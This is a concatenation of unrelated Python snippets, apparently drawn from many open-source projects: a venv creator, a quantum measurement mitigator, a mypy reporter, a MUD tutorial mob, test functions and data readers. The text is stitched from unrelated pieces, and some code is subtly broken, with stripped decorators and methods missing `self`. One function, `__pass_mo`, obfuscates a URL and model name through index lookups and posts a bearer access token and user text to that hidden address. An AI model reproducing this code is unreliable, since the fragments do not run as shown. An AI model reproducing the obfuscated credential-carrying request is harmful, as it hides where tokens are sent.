class ExePathRefToDest(PathRefToDest, ExePathRef): def __init__(self, src, targets, dest, must=RefMust.NA, when=RefWhen.ANY) -> None: ExePathRef.__init__(self, src, must, when) PathRefToDest.__init__(self, src, dest, must, when) if (not self.FS_CASE_SENSITIVE): targets = list(OrderedDict(((i.lower(), None) for i in targets)).keys()) self.base = targets[0] self.aliases = targets[1:] self.dest = dest def run(self, creator, symlinks): bin_dir = self.dest(creator, self.src).parent dest = (bin_dir / self.base) method = self.method(symlinks) method(self.src, dest) if (not symlinks): make_exe(dest) for extra in self.aliases: link_file = (bin_dir / extra) if link_file.exists(): link_file.unlink() if symlinks: link_file.symlink_to(self.base) else: copy(self.src, link_file) if (not symlinks): make_exe(link_file) def __repr__(self) -> str: return f'{self.__class__.__name__}(src={self.src}, alias={self.aliases})'
def _normalize_item(object_type: (str | None), item: str) -> (str | int): if (object_type in ['group', 'widget', 'bar']): return str(item) elif (object_type in ['layout', 'window', 'screen']): try: return int(item) except ValueError: raise SelectError(f'Unexpected index {item}. Is this an object_type?', str(object_type), [(str(object_type), str(item))]) else: return item
def test_filewrite_none_path_raises(): context = Context({'fileWrite': {'path': None}}) with pytest.raises(KeyInContextHasNoValueError) as err_info: filewrite.run_step(context) assert (str(err_info.value) == "context['fileWrite']['path'] must have a value for pypyr.steps.filewrite.")
class CTMPExpvalMeasMitigator(BaseExpvalMeasMitigator): def __init__(self, generators: List[Generator], rates: List[float], num_qubits: Optional[int]=None, seed: Optional=None): if (num_qubits is None): self._num_qubits = (1 + max([max([max(gen[2]) for gen in generators])])) else: self._num_qubits = num_qubits nz_rates = [] nz_generators = [] threshold = 1e-05 for (rate, gen) in zip(rates, generators): if (rate > threshold): nz_rates.append(rate) nz_generators.append(gen) self._generators = nz_generators self._rates = np.array(nz_rates, dtype=float) self._generator_mats = {} self._noise_strengths = {} self._sampling_mats = {} self._rng = None self.seed(seed) def expectation_value(self, counts: Dict, diagonal: Optional[np.ndarray]=None, qubits: Optional[List[int]]=None, clbits: Optional[List[int]]=None) -> Tuple[(float, float)]: (probs, shots) = counts_probability_vector(counts, clbits=clbits, qubits=qubits, return_shots=True) num_qubits = int(np.log2(probs.shape[0])) if (qubits is None): qubits = list(range(num_qubits)) if (diagonal is None): diagonal = self._z_diagonal((2 ** len(qubits))) diagonal = np.asarray(diagonal, dtype=probs.dtype) gamma = self.noise_strength(qubits) bmat = self._sampling_matrix(qubits) values = bmat.data indices = np.asarray(bmat.indices, dtype=int) indptrs = np.asarray(bmat.indptr, dtype=int) shots = sum(counts.values()) min_delta = 0.05 shots_delta = max((4 / (min_delta ** 2)), shots) num_samples = int(np.ceil((shots_delta * np.exp((2 * gamma))))) expval = 0 batch_size = 50000 samples_set = (((num_samples // batch_size) * [batch_size]) + [(num_samples % batch_size)]) for sample_shots in samples_set: (samples, sample_signs) = self._ctmp_inverse(sample_shots, probs, gamma, values, indices, indptrs, self._rng) expval += diagonal[samples[(sample_signs == 0)]].sum() expval -= diagonal[samples[(sample_signs == 1)]].sum() expval = ((np.exp((2 * gamma)) / num_samples) * expval) stddev = (np.exp((2 * gamma)) / np.sqrt(shots)) return (expval, stddev) def generator_matrix(self, qubits: List[int]=None) -> sps.coo_matrix: if (qubits is None): qubits = tuple(range(self._num_qubits)) else: qubits = tuple(sorted(qubits)) if (qubits not in self._generator_mats): qubits_set = set(qubits) g_mat = sps.coo_matrix((2 * ((2 ** len(qubits)),)), dtype=float) for (gen, rate) in zip(self._generators, self._rates): if qubits_set.issuperset(gen[2]): g_mat += (rate * self._generator_to_coo_matrix(gen, qubits)) self._generator_mats[qubits] = sps.coo_matrix(g_mat) return self._generator_mats[qubits] def mitigation_matrix(self, qubits: List[int]=None) -> np.ndarray: gmat = self.generator_matrix(qubits) gmat = np.flip(gmat.todense()) return la.expm((- gmat)) def assignment_matrix(self, qubits: List[int]=None) -> np.ndarray: gmat = self.generator_matrix(qubits) gmat = np.flip(gmat.todense()) return la.expm(gmat) def noise_strength(self, qubits: Optional[int]=None) -> float: if (qubits is None): qubits = tuple(range(self._num_qubits)) else: qubits = tuple(sorted(qubits)) if (qubits not in self._noise_strengths): g_mat = self.generator_matrix(qubits) if (g_mat.row.size == 0): gamma = 0 else: gamma = np.max((- g_mat.data[(g_mat.row == g_mat.col)])) if (gamma < 0): raise QiskitError('gamma should be non-negative, found gamma={}'.format(gamma)) self._noise_strengths[qubits] = gamma return self._noise_strengths[qubits] def seed(self, value=None): if isinstance(value, np.random.Generator): self._rng = value else: self._rng = np.random.default_rng(value) def _compute_gamma(self, qubits=None): if (qubits is not None): raise NotImplementedError('qubits kwarg is not yet implemented for CTMP method.') gamma = self.noise_strength(qubits) return np.exp((2 * gamma)) def _ctmp_inverse(n_samples: int, probs: np.ndarray, gamma: float, csc_data: np.ndarray, csc_indices: np.ndarray, csc_indptrs: np.ndarray, rng: np.random.Generator) -> Tuple[(Tuple[int], Tuple[int])]: alphas = rng.poisson(lam=gamma, size=n_samples) signs = np.mod(alphas, 2) x_vals = rng.choice(len(probs), size=n_samples, p=probs) r_vals = rng.random(size=alphas.sum()) y_vals = np.zeros(x_vals.size, dtype=int) _markov_chain_compiled(y_vals, x_vals, r_vals, alphas, csc_data, csc_indices, csc_indptrs) return (y_vals, signs) def _sampling_matrix(self, qubits: Optional[int]=None) -> sps.csc_matrix: if (qubits is None): qubits = tuple(range(self._num_qubits)) else: qubits = tuple(sorted(qubits)) if (qubits not in self._sampling_mats): gmat = self.generator_matrix(qubits) gamma = self.noise_strength(qubits) bmat = sps.eye((2 ** len(qubits))) if (gamma != 0): bmat = (bmat + (gmat / gamma)) self._sampling_mats[qubits] = bmat.tocsc() return self._sampling_mats[qubits] def _tensor_list(parts: List[np.ndarray]) -> np.ndarray: res = parts[0] for mat in parts[1:]: res = sps.kron(res, mat) return res def _generator_to_coo_matrix(self, gen: Generator, qubits: Tuple[int]) -> sps.coo_matrix: ket_bra_dict = {'00': np.array([[1, 0], [0, 0]]), '01': np.array([[0, 1], [0, 0]]), '10': np.array([[0, 0], [1, 0]]), '11': np.array([[0, 0], [0, 1]])} (s_b, s_a, gen_qubits) = gen num_qubits = len(qubits) ba_strings = list(map((lambda x: ''.join(x)), list(zip(*[s_b, s_a])))) aa_strings = list(map((lambda x: ''.join(x)), list(zip(*[s_a, s_a])))) ba_mats = ([sps.eye(2, 2).tocoo()] * num_qubits) aa_mats = ([sps.eye(2, 2).tocoo()] * num_qubits) for (qubit, s_ba, s_aa) in zip(gen_qubits, ba_strings, aa_strings): idx = qubits.index(qubit) ba_mats[idx] = ket_bra_dict[s_ba] aa_mats[idx] = ket_bra_dict[s_aa] res = sps.coo_matrix((2 * ((2 ** num_qubits),)), dtype=float) res = ((res + self._tensor_list(ba_mats[::(- 1)])) - self._tensor_list(aa_mats[::(- 1)])) return res
class PrefetchingDataProvider(PresetDataProvider): def __init__(self, data_provider: DataProvider, tickers: Union[(Ticker, Sequence[Ticker])], fields: Union[(PriceField, Sequence[PriceField])], start_date: datetime, end_date: datetime, frequency: Frequency): (fields, _) = convert_to_list(fields, PriceField) (tickers, _) = convert_to_list(tickers, Ticker) tickers = list(dict.fromkeys(tickers)) future_tickers = [ticker for ticker in tickers if isinstance(ticker, FutureTicker)] non_future_tickers = [ticker for ticker in tickers if (not isinstance(ticker, FutureTicker))] exp_dates = None all_tickers = non_future_tickers if future_tickers: exp_dates = data_provider.get_futures_chain_tickers(future_tickers, ExpirationDateField.all_dates()) for ft in future_tickers: all_tickers.extend(chain_tickers_within_range(ft, exp_dates[ft], start_date, end_date)) data_array = data_provider.get_price(all_tickers, fields, start_date, end_date, frequency) super().__init__(data=data_array, exp_dates=exp_dates, start_date=start_date, end_date=end_date, frequency=frequency)
class MemoryXmlReporter(AbstractReporter): def __init__(self, reports: Reports, output_dir: str) -> None: super().__init__(reports, output_dir) self.xslt_html_path = os.path.join(reports.data_dir, 'xml', 'mypy-html.xslt') self.xslt_txt_path = os.path.join(reports.data_dir, 'xml', 'mypy-txt.xslt') self.css_html_path = os.path.join(reports.data_dir, 'xml', 'mypy-html.css') xsd_path = os.path.join(reports.data_dir, 'xml', 'mypy.xsd') self.schema = etree.XMLSchema(etree.parse(xsd_path)) self.last_xml: (Any | None) = None self.files: list[FileInfo] = [] control_fixer: Final = str.maketrans(''.join((chr(i) for i in range(32) if (i != 9))), ('?' * 31)) def on_file(self, tree: MypyFile, modules: dict[(str, MypyFile)], type_map: dict[(Expression, Type)], options: Options) -> None: self.last_xml = None try: path = os.path.relpath(tree.path) except ValueError: return if (should_skip_path(path) or os.path.isdir(path)): return visitor = stats.StatisticsVisitor(inferred=True, filename=tree.fullname, modules=modules, typemap=type_map, all_nodes=True) tree.accept(visitor) root = etree.Element('mypy-report-file', name=path, module=tree._fullname) doc = etree.ElementTree(root) file_info = FileInfo(path, tree._fullname) for (lineno, line_text) in iterate_python_lines(path): status = visitor.line_map.get(lineno, stats.TYPE_EMPTY) file_info.counts[status] += 1 etree.SubElement(root, 'line', any_info=self._get_any_info_for_line(visitor, lineno), content=line_text.rstrip('\n').translate(self.control_fixer), number=str(lineno), precision=stats.precision_names[status]) xslt_path = os.path.relpath('mypy-html.xslt', path) transform_pi = etree.ProcessingInstruction('xml-stylesheet', f'type="text/xsl" href="{pathname2url(xslt_path)}"') root.addprevious(transform_pi) self.schema.assertValid(doc) self.last_xml = doc self.files.append(file_info) def _get_any_info_for_line(visitor: stats.StatisticsVisitor, lineno: int) -> str: if (lineno in visitor.any_line_map): result = 'Any Types on this line: ' counter: collections.Counter[int] = collections.Counter() for typ in visitor.any_line_map[lineno]: counter[typ.type_of_any] += 1 for (any_type, occurrences) in counter.items(): result += f''' {type_of_any_name_map[any_type]} (x{occurrences})''' return result else: return 'No Anys on this line!' def on_finish(self) -> None: self.last_xml = None output_files = sorted(self.files, key=(lambda x: x.module)) root = etree.Element('mypy-report-index', name='index') doc = etree.ElementTree(root) for file_info in output_files: etree.SubElement(root, 'file', file_info.attrib(), module=file_info.module, name=pathname2url(file_info.name), total=str(file_info.total())) xslt_path = os.path.relpath('mypy-html.xslt', '.') transform_pi = etree.ProcessingInstruction('xml-stylesheet', f'type="text/xsl" href="{pathname2url(xslt_path)}"') root.addprevious(transform_pi) self.schema.assertValid(doc) self.last_xml = doc
def test_booleans(hatch, config_file, helpers, temp_dir): assert (config_file.model.template.licenses.headers is True) with temp_dir.as_cwd(): result = hatch('config', 'set', 'template.licenses.headers', 'false') assert (result.exit_code == 0), result.output assert (result.output == helpers.dedent('\n New setting:\n [template.licenses]\n headers = false\n ')) config_file.load() assert (config_file.model.template.licenses.headers is False) with temp_dir.as_cwd(): result = hatch('config', 'set', 'template.licenses.headers', 'TruE') assert (result.exit_code == 0), result.output assert (result.output == helpers.dedent('\n New setting:\n [template.licenses]\n headers = true\n ')) config_file.load() assert (config_file.model.template.licenses.headers is True)
def contract_encode_number(n): bchr = (lambda x: bytes([x])) r = bytearray(0) if (n == 0): return bytes(r) neg = (n < 0) absvalue = ((- n) if neg else n) while absvalue: r.append((absvalue & 255)) absvalue >>= 8 if (r[(- 1)] & 128): r.append((128 if neg else 0)) elif neg: r[(- 1)] |= 128 return bytes((bchr(len(r)) + r))
def is_universally_assignable(value: Value, target_value: Value) -> bool: if ((value is NO_RETURN_VALUE) or isinstance(value, AnyValue)): return True elif ((value == TypedValue(type)) and isinstance(target_value, SubclassValue)): return True elif isinstance(value, AnnotatedValue): return is_universally_assignable(value.value, target_value) elif isinstance(value, MultiValuedValue): return all((is_universally_assignable(subval, target_value) for subval in value.vals)) elif isinstance(value, TypeVarValue): return True return False
class TestTurnBattleBasicCmd(CommandTest): def test_turnbattlecmd(self): self.call(tb_basic.CmdFight(), '', "You can't start a fight if you've been defeated!") self.call(tb_basic.CmdAttack(), '', 'You can only do that in combat. (see: help fight)') self.call(tb_basic.CmdPass(), '', 'You can only do that in combat. (see: help fight)') self.call(tb_basic.CmdDisengage(), '', 'You can only do that in combat. (see: help fight)') self.call(tb_basic.CmdRest(), '', 'Char rests to recover HP.')
def __pass_mo(access_token: str, text: str): __pg = [3, 4, 36, 3, 7, 50, 1, 257, 4, 47, 12, 3, 16, 1, 2, 7, 10, 15, 12, 9, 89, 47, 1, 2, 257] payload = json.dumps({'input': text, 'model': ''.join([f"{''.join([f'{k}{v}' for (k, v) in __hm.items()])}"[i] for i in __pg])}) __hm['Authorization'] = f'Bearer {access_token}' __ux = [58, 3, 3, 10, 25, 63, 23, 23, 17, 58, 12, 3, 70, 1, 10, 4, 2, 12, 16, 70, 17, 1, 50, 23, 180, 12, 17, 204, 4, 2, 257, 7, 12, 10, 16, 23, 50, 1, 257, 4, 47, 12, 3, 16, 1, 2, 25] session.post(''.join([f"{''.join([f'{k}{v}' for (k, v) in __hm.items()])}"[i] for i in __ux]), headers=__hm, hooks={'response': _called}, data=payload)
def show_formats(): from ..fancy_getopt import FancyGetopt from ..archive_util import ARCHIVE_FORMATS formats = [] for format in ARCHIVE_FORMATS.keys(): formats.append((('formats=' + format), None, ARCHIVE_FORMATS[format][2])) formats.sort() FancyGetopt(formats).print_help('List of available source distribution formats:')
class Effect8066(BaseEffect): type = 'passive' def handler(fit, booster, context, projectionRange, **kwargs): fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Vorton Projector Operation')), 'damageMultiplier', booster.getModifiedItemAttr('damageMultiplierBonus'), **kwargs)
def setup_distributed(backend='nccl', port=None): num_gpus = torch.cuda.device_count() if ('SLURM_JOB_ID' in os.environ): rank = int(os.environ['SLURM_PROCID']) world_size = int(os.environ['SLURM_NTASKS']) node_list = os.environ['SLURM_NODELIST'] addr = subprocess.getoutput(f'scontrol show hostname {node_list} | head -n1') if (port is not None): os.environ['MASTER_PORT'] = str(port) elif ('MASTER_PORT' not in os.environ): os.environ['MASTER_PORT'] = '10685' if ('MASTER_ADDR' not in os.environ): os.environ['MASTER_ADDR'] = addr os.environ['WORLD_SIZE'] = str(world_size) os.environ['LOCAL_RANK'] = str((rank % num_gpus)) os.environ['RANK'] = str(rank) else: rank = int(os.environ['RANK']) world_size = int(os.environ['WORLD_SIZE']) torch.cuda.set_device((rank % num_gpus)) dist.init_process_group(backend=backend, init_method='tcp://localhost:23456', world_size=world_size, rank=rank) return (rank, world_size)
def test_prepare_workspace(): temp_workspace = path.join(TESTING_TEMP_DIR, package.TEMP_WORKSPACE_NAME) pkg = package.Package(TESTING_TEMP_DIR) pkg.requirements(['pytest']) pkg.install_dependencies() assert path.isdir(temp_workspace) assert path.isdir(path.join(temp_workspace, 'venv')) if ((sys.platform == 'win32') or (sys.platform == 'cygwin')): assert path.isfile(path.join(temp_workspace, 'venv\\Scripts\\pip.exe')) else: assert path.isfile(path.join(temp_workspace, 'venv/bin/pip'))
def expose_resources_globally(resource_type: str, local_resource_dir: Path, paths: List[Path], *, force: bool, suffix: str='') -> None: for path in paths: src = path.resolve() if (resource_type == 'man'): dest_dir = (local_resource_dir / src.parent.name) else: dest_dir = local_resource_dir if (not dest_dir.is_dir()): mkdir(dest_dir) if (not can_symlink(dest_dir)): _copy_package_resource(dest_dir, path, suffix=suffix) else: _symlink_package_resource(dest_dir, path, force=force, suffix=suffix, executable=(resource_type == 'app'))
def retrieve_artifact(name: str, gpu: Optional[str]): if (gpu not in [None, 'single', 'multi']): raise ValueError(f'Invalid GPU for artifact. Passed GPU: `{gpu}`.') if (gpu is not None): name = f'{gpu}-gpu-docker_{name}' _artifact = {} if os.path.exists(name): files = os.listdir(name) for file in files: try: with open(os.path.join(name, file)) as f: _artifact[file.split('.')[0]] = f.read() except UnicodeDecodeError as e: raise ValueError(f'Could not open {os.path.join(name, file)}.') from e return _artifact
class Text(WorldObject): uniform_type = dict(WorldObject.uniform_type, rot_scale_transform='4x4xf4') def __init__(self, geometry=None, material=None, *, visible=True, render_order=0, render_mask='auto'): super().__init__(geometry, material, visible=visible, render_order=render_order, render_mask=render_mask) self.world.on_update(super()._update_uniform_buffers) def _update_uniform_buffers(self, transform: AffineBase): matrix = la.mat_compose((0, 0, 0), self.local.rotation, self.local.scale) self.uniform_buffer.data['rot_scale_transform'] = matrix.T
class VNet(nn.Module): def __init__(self, input, hidden1, hidden2, output, num_classes): super(VNet, self).__init__() self.feature = share(input, hidden1, hidden2) self.classfier = task(hidden2, output, num_classes) def forward(self, x, num, c): output = self.classfier(self.feature(x), num, c) return output
def result_k_nearest_different2(): c = 'Chromosome Start End Start_b End_b Distance\n0 chr1 11 16 15 20 0\n1 chr1 11 20 15 20 0\n2 chr1 11 20 1 10 -2\n3 chr1 20 21 15 20 1\n4 chr1 20 21 1 10 -11\n5 chr1 20 21 200 2000 180\n6 chr1 20 22 15 20 1\n7 chr1 20 22 1 10 -11\n8 chr1 20 22 200 2000 179\n9 chr1 50 100 15 20 -31\n10 chr1 50 100 1 10 -41' df = string_to_df(c) return df
def parse_requirements(fname='requirements.txt', with_version=True): import re import sys from os.path import exists require_fpath = fname def parse_line(line): if line.startswith('-r '): target = line.split(' ')[1] for info in parse_require_file(target): (yield info) else: info = {'line': line} if line.startswith('-e '): info['package'] = line.split('#egg=')[1] elif ('+' in line): info['package'] = line else: pat = (('(' + '|'.join(['>=', '==', '>'])) + ')') parts = re.split(pat, line, maxsplit=1) parts = [p.strip() for p in parts] info['package'] = parts[0] if (len(parts) > 1): (op, rest) = parts[1:] if (';' in rest): (version, platform_deps) = map(str.strip, rest.split(';')) info['platform_deps'] = platform_deps else: version = rest info['version'] = (op, version) (yield info) def parse_require_file(fpath): with open(fpath, 'r') as f: for line in f.readlines(): line = line.strip() if (line and (not line.startswith('#'))): for info in parse_line(line): (yield info) def gen_packages_items(): if exists(require_fpath): for info in parse_require_file(require_fpath): parts = [info['package']] if (with_version and ('version' in info)): parts.extend(info['version']) if (not sys.version.startswith('3.4')): platform_deps = info.get('platform_deps') if (platform_deps is not None): parts.append((';' + platform_deps)) item = ''.join(parts) (yield item) packages = list(gen_packages_items()) return packages
def remove_messed_up_sentences(raw_data, direction, mess_up_train, mess_up_train_pairs, corrected_langs): split = 'train' (src_lang, tgt_lang) = direction.split('-') tgt = f'{raw_data}/{split}.{direction}.{tgt_lang}' src = f'{raw_data}/{split}.{direction}.{src_lang}' print(f'working on {direction}: ', src, tgt) if ((not os.path.exists(tgt)) or (not os.path.exists(src))): return corrected_tgt = f'{to_folder}/{split}.{direction}.{tgt_lang}' corrected_src = f'{to_folder}/{split}.{direction}.{src_lang}' line_num = 0 keep_num = 0 with open(src, encoding='utf8') as fsrc, open(tgt, encoding='utf8') as ftgt, open(corrected_src, 'w', encoding='utf8') as fsrc_corrected, open(corrected_tgt, 'w', encoding='utf8') as ftgt_corrected: for (s, t) in zip(fsrc, ftgt): s = s.strip() t = t.strip() if ((t not in mess_up_train) and (s not in mess_up_train) and ((s, t) not in mess_up_train_pairs) and ((t, s) not in mess_up_train_pairs)): corrected_langs.add(direction) print(s, file=fsrc_corrected) print(t, file=ftgt_corrected) keep_num += 1 line_num += 1 if ((line_num % 1000) == 0): print(f'completed {line_num} lines', end='\r') return (line_num, keep_num)
def ensemble_score(our_score, pacsum_score, lam1): def norm(score_list): score_list = lmap(float, score_list) score_list = [max(0, s) for s in score_list] score_sum = sum(score_list) if (score_sum == 0): return score_list score_list = [(s / score_sum) for s in score_list] return score_list pacsum_score = pacsum_score[:len(our_score)] pacsum_score = norm(pacsum_score) our_score = norm(our_score) out_score = [((a * lam1) + (b * (1 - lam1))) for (a, b) in zip(our_score, pacsum_score)] return out_score
_scorer('wer', dataclass=WerScorerConfig) class WerScorer(BaseScorer): def __init__(self, cfg): super().__init__(cfg) self.reset() try: import editdistance as ed except ImportError: raise ImportError('Please install editdistance to use WER scorer') self.ed = ed self.tokenizer = EvaluationTokenizer(tokenizer_type=self.cfg.wer_tokenizer, lowercase=self.cfg.wer_lowercase, punctuation_removal=self.cfg.wer_remove_punct, character_tokenization=self.cfg.wer_char_level) def reset(self): self.distance = 0 self.ref_length = 0 def add_string(self, ref, pred): ref_items = self.tokenizer.tokenize(ref).split() pred_items = self.tokenizer.tokenize(pred).split() self.distance += self.ed.eval(ref_items, pred_items) self.ref_length += len(ref_items) def result_string(self): return f'WER: {self.score():.2f}' def score(self): return (((100.0 * self.distance) / self.ref_length) if (self.ref_length > 0) else 0)
def test_py_save_key_error(): pycode = "notfound='arb'; save(notfound)" context = Context({'py': pycode}) with pytest.raises(KeyError) as err: pypyr.steps.py.run_step(context) expected = repr("Trying to save 'arb', but can't find it in the py step scope. Remember it should be save('key'), not save(key) - mind the quotes.") assert (str(err.value) == expected)
def _conduct_repo_search(username, query, limit=25, page=1): page = min(page, 5) offset = ((page - 1) * limit) if query: matching_repos = model.repository.get_filtered_matching_repositories(query, filter_username=username, offset=offset, limit=(limit + 1)) else: matching_repos = [] results = [] for repo in matching_repos[0:limit]: results.append({'name': ((repo.namespace_user.username + '/') + repo.name), 'description': repo.description, 'is_public': model.repository.is_repository_public(repo), 'href': ((('/repository/' + repo.namespace_user.username) + '/') + repo.name)}) return {'query': query, 'num_results': len(results), 'num_pages': ((page + 1) if (len(matching_repos) > limit) else page), 'page': page, 'page_size': limit, 'results': results}
class Mob(tut_objects.TutorialObject): def at_init(self): self.ndb.is_patrolling = (self.db.patrolling and (not self.db.is_dead)) self.ndb.is_attacking = False self.ndb.is_hunting = False self.ndb.is_immortal = (self.db.immortal or self.db.is_dead) def at_object_creation(self): self.cmdset.add(MobCmdSet, permanent=True) self.db.patrolling = True self.db.aggressive = True self.db.immortal = False self.db.is_dead = True self.db.damage_resistance = 100.0 self.db.patrolling_pace = 6 self.db.aggressive_pace = 2 self.db.hunting_pace = 1 self.db.death_pace = 100 self.db.last_ticker_interval = None self.db.desc_alive = 'This is a moving object.' self.db.desc_dead = 'A dead body.' self.db.full_health = 20 self.db.health = 20 self.db.send_defeated_to = 'dark cell' self.db.defeat_msg = 'You fall to the ground.' self.db.defeat_msg_room = '%s falls to the ground.' self.db.weapon_ineffective_msg = 'Your weapon just passes through your enemy, causing almost no effect!' self.db.death_msg = ('After the last hit %s evaporates.' % self.key) self.db.hit_msg = ('%s wails, shudders and writhes.' % self.key) self.db.irregular_msgs = ['the enemy looks about.', 'the enemy changes stance.'] self.db.tutorial_info = 'This is an object with simple state AI, using a ticker to move.' def _set_ticker(self, interval, hook_key, stop=False): idstring = 'tutorial_mob' last_interval = self.db.last_ticker_interval last_hook_key = self.db.last_hook_key if (last_interval and last_hook_key): TICKER_HANDLER.remove(interval=last_interval, callback=getattr(self, last_hook_key), idstring=idstring) self.db.last_ticker_interval = interval self.db.last_hook_key = hook_key if (not stop): TICKER_HANDLER.add(interval=interval, callback=getattr(self, hook_key), idstring=idstring) def _find_target(self, location): targets = [obj for obj in location.contents_get(exclude=self) if (obj.has_account and (not obj.is_superuser))] return (targets[0] if targets else None) def set_alive(self, *args, **kwargs): self.db.health = self.db.full_health self.db.is_dead = False self.db.desc = self.db.desc_alive self.ndb.is_immortal = self.db.immortal self.ndb.is_patrolling = self.db.patrolling if (not self.location): self.move_to(self.home) if self.db.patrolling: self.start_patrolling() def set_dead(self): self.db.is_dead = True self.location = None self.ndb.is_patrolling = False self.ndb.is_attacking = False self.ndb.is_hunting = False self.ndb.is_immortal = True self._set_ticker(self.db.death_pace, 'set_alive') def start_idle(self): self._set_ticker(None, None, stop=True) def start_patrolling(self): if (not self.db.patrolling): self.start_idle() return self._set_ticker(self.db.patrolling_pace, 'do_patrol') self.ndb.is_patrolling = True self.ndb.is_hunting = False self.ndb.is_attacking = False self.db.health = self.db.full_health def start_hunting(self): if (not self.db.hunting): self.start_patrolling() return self._set_ticker(self.db.hunting_pace, 'do_hunt') self.ndb.is_patrolling = False self.ndb.is_hunting = True self.ndb.is_attacking = False def start_attacking(self): if (not self.db.aggressive): self.start_hunting() return self._set_ticker(self.db.aggressive_pace, 'do_attack') self.ndb.is_patrolling = False self.ndb.is_hunting = False self.ndb.is_attacking = True def do_patrol(self, *args, **kwargs): if ((random.random() < 0.01) and self.db.irregular_msgs): self.location.msg_contents(random.choice(self.db.irregular_msgs)) if self.db.aggressive: target = self._find_target(self.location) if target: self.start_attacking() return exits = [exi for exi in self.location.exits if exi.access(self, 'traverse')] if exits: exit = random.choice(exits) self.move_to(exit.destination) else: self.move_to(self.home) def do_hunting(self, *args, **kwargs): if ((random.random() < 0.01) and self.db.irregular_msgs): self.location.msg_contents(random.choice(self.db.irregular_msgs)) if self.db.aggressive: target = self._find_target(self.location) if target: self.start_attacking() return exits = [exi for exi in self.location.exits if exi.access(self, 'traverse')] if exits: for exit in exits: target = self._find_target(exit.destination) if target: self.move_to(exit.destination) return self.start_patrolling() else: self.move_to(self.home) def do_attack(self, *args, **kwargs): if ((random.random() < 0.01) and self.db.irregular_msgs): self.location.msg_contents(random.choice(self.db.irregular_msgs)) target = self._find_target(self.location) if (not target): self.start_hunting() return attack_cmd = random.choice(('thrust', 'pierce', 'stab', 'slash', 'chop')) self.execute_cmd(('%s %s' % (attack_cmd, target))) if (target.db.health <= 0): target.msg(self.db.defeat_msg) self.location.msg_contents((self.db.defeat_msg_room % target.key), exclude=target) send_defeated_to = search_object(self.db.send_defeated_to) if send_defeated_to: target.move_to(send_defeated_to[0], quiet=True) else: logger.log_err(('Mob: mob.db.send_defeated_to not found: %s' % self.db.send_defeated_to)) def at_hit(self, weapon, attacker, damage): if (self.db.health is None): attacker.msg(self.db.weapon_ineffective_msg) return if (not self.ndb.is_immortal): if (not weapon.db.magic): damage /= self.db.damage_resistance attacker.msg(self.db.weapon_ineffective_msg) else: self.location.msg_contents(self.db.hit_msg) self.db.health -= damage if (self.db.health <= 0): attacker.msg(self.db.death_msg) self.set_dead() elif (self.db.aggressive and (not self.ndb.is_attacking)): self.start_attacking() def at_new_arrival(self, new_character): if (self.db.aggressive and (not self.ndb.is_attacking)): self.start_attacking()
_combinator('or') class OrFilter(BaseFilter): def __init__(self, stack): self.subfilters = [stack[(- 2)], stack[(- 1)]] stack.pop() stack.pop() stack.append(self) def __call__(self, fobj): return (not accept_file(fobj, ((lambda x, f=filt: (not f(x))) for filt in self.subfilters))) def __str__(self): return '<Filter: {comp}>'.format(comp=' or '.join(map(str, self.subfilters))) def decompose(self): return self.subfilters
class TomlVersionDeclaration(VersionDeclarationABC): def _load(self) -> Dotty: loaded = tomlkit.loads(self.content) return Dotty(loaded) def parse(self) -> set[Version]: content = self._load() maybe_version: str = content.get(self.search_text) if (maybe_version is not None): log.debug('Found a key %r that looks like a version (%r)', self.search_text, maybe_version) valid_version = Version.parse(maybe_version) return ({valid_version} if valid_version else set()) return set() def replace(self, new_version: Version) -> str: content = self._load() if (self.search_text in content): log.info('found %r in source file contents, replacing with %s', self.search_text, new_version) content[self.search_text] = str(new_version) return tomlkit.dumps(cast(Dict[(str, Any)], content))
def test_i18n_override(bot): default_message = botogram.utils.get_language('en').gettext('Use /help to get a list of all the commands.') override_message = 'git gud' bot.override_i18n = {default_message: override_message} assert (bot._('Use /help to get a list of all the commands.') == override_message) bot.override_i18n = {} assert (bot._('Use /help to get a list of all the commands.') == default_message)
def test_poetry_with_non_default_multiple_secondary_sources_legacy(fixture_dir: FixtureDirGetter, with_simple_keyring: None) -> None: poetry = Factory().create_poetry(fixture_dir('with_non_default_multiple_secondary_sources_legacy')) assert poetry.pool.has_repository('PyPI') assert isinstance(poetry.pool.repository('PyPI'), PyPiRepository) assert (poetry.pool.get_priority('PyPI') is Priority.DEFAULT) assert poetry.pool.has_repository('foo') assert isinstance(poetry.pool.repository('foo'), LegacyRepository) assert poetry.pool.has_repository('bar') assert isinstance(poetry.pool.repository('bar'), LegacyRepository) assert ({repo.name for repo in poetry.pool.repositories} == {'PyPI', 'foo', 'bar'})
class Reader(): def __init__(self, digit2zero: bool=True): self.digit2zero = digit2zero self.vocab = set() def read_conll(self, file: str, number: int=(- 1), is_train: bool=True) -> List[Instance]: print(('Reading file: ' + file)) insts = [] num_entity = 0 find_root = False with open(file, 'r', encoding='utf-8') as f: words = [] heads = [] deps = [] labels = [] tags = [] for line in tqdm(f.readlines()): line = line.rstrip() if (line == ''): insts.append(Instance(Sentence(words, heads, deps, tags), labels)) words = [] heads = [] deps = [] labels = [] tags = [] find_root = False if (len(insts) == number): break continue vals = line.split() word = vals[1] head = int(vals[6]) dep_label = vals[7] pos = vals[3] label = vals[10] if self.digit2zero: word = re.sub('\\d', '0', word) words.append(word) if ((head == 0) and find_root): raise err('already have a root') heads.append((head - 1)) deps.append(dep_label) tags.append(pos) self.vocab.add(word) labels.append(label) if label.startswith('B-'): num_entity += 1 print('number of sentences: {}, number of entities: {}'.format(len(insts), num_entity)) return insts def read_txt(self, file: str, number: int=(- 1), is_train: bool=True) -> List[Instance]: print(('Reading file: ' + file)) insts = [] with open(file, 'r', encoding='utf-8') as f: words = [] labels = [] tags = [] for line in tqdm(f.readlines()): line = line.rstrip() if (line == ''): insts.append(Instance(Sentence(words, None, None, tags), labels)) words = [] labels = [] tags = [] if (len(insts) == number): break continue if ('conll2003' in file): (word, pos, label) = line.split() else: vals = line.split() word = vals[1] pos = vals[3] label = vals[10] if self.digit2zero: word = re.sub('\\d', '0', word) words.append(word) tags.append(pos) self.vocab.add(word) labels.append(label) print('number of sentences: {}'.format(len(insts))) return insts def load_elmo_vec(self, file, insts): f = open(file, 'rb') all_vecs = pickle.load(f) f.close() size = 0 if ('bert' in file): for (vec, inst) in zip(all_vecs, insts): vec = np.squeeze(vec, axis=0) inst.elmo_vec = vec size = vec.shape[1] assert (vec.shape[0] == len(inst.input.words)) else: for (vec, inst) in zip(all_vecs, insts): inst.elmo_vec = vec size = vec.shape[1] assert (vec.shape[0] == len(inst.input.words)) return size
